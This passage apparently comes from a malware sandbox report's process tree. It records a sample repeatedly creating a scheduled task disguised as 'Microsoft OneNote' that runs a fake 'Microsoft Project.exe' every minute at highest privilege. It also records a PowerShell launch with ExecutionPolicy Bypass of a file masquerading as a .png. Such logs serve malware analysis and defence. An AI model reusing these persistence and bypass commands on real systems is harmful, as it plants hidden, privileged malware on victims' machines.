                                                                                                                                                                                                                                                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:3848
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:2572
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                              PID:1484
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:4152
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                PID:768
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:4788
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:3408
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:216
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                      PID:780
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:3064
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:536
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:4836
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                            PID:1876
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:3544
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:2436
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:768
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4800
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1896
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1116
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1500
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1876
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1008
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2448
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3880
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2404
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3748
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2908
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1168
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4388
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1660
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1416
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5076
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4068
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:736
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2392
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5036
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4780
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:544
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4808
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1548
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1352
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4872
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2284
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1804
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4996
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2200
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1008
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2728
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1520
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2792
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4520
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4488
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2852
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\upzczhsp.pue.png"' & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\upzczhsp.pue.png"'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2324
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4724
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1208
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1112
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\CMD.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4928
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft OneNote" /tr "C:\Users\Admin\Documents\Microsoft Project.exe" /RL HIGHEST
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\CMD.exe
